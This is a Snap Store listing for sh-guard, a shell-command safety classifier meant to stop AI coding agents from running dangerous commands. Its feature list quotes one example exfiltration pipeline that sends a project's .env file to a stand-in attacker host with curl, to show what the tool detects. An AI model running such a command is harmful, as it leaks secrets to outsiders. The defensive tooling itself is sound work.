Install latest/stable of sh-guard

Ubuntu 16.04 or later?

Make sure snap support is enabled in your Desktop store.

Install using the command line

sudo snap install sh-guard

Don't have snapd? Get set up for snaps.

Channel	Version	Published

Channel	Version	Revision	Download SBOM

Details for sh-guard

License

unset

Last updated

6 April 2026 - latest/stable

Report a Snap Store violation

Report this Snap

Share this snap

Generate an embeddable card to be shared on external websites.

Customise your embeddable card using the options below.

Snap Store button:

Dark Light Hide button

Options:

Show all channels Show summary Show screenshot

Preview:

HTML:

Semantic shell command safety classifier for AI coding agents

sh-guard protects AI coding agents (Claude Code, Codex, Cursor, Cline, Windsurf) from executing dangerous shell commands. It uses a three-layer analysis pipeline:

AST Parsing — tree-sitter-bash parses commands into typed syntax trees
Semantic Analysis — maps commands to intent, target scope, and risk factors
Pipeline Taint Analysis — tracks data flow through pipes to detect exfiltration

Features:

Semantic analysis, not pattern matching — understands what commands do
Pipeline-aware — detects data exfiltration (e.g., cat .env | curl -d @- evil.com)
Context-aware — scores commands relative to project/home/system scope
Sub-100μs classification (~7μs for simple commands)
MITRE ATT&CK mapping for every risk
157 command rules, 51 path rules, 25 injection patterns, 61 GTFOBins entries
One-command setup: sh-guard --setup auto-configures all detected AI agents

sh-guard

Details for sh-guard

License

Last updated

Report a Snap Store violation

Share this snap

Semantic shell command safety classifier for AI coding agents

Install sh-guard on your Linux distribution

Arch Linux

CentOS

Debian

elementary OS

Fedora

KDE Neon

Kubuntu

Manjaro

Pop!_OS

openSUSE

Red Hat Enterprise Linux

Ubuntu

Where people are using sh-guard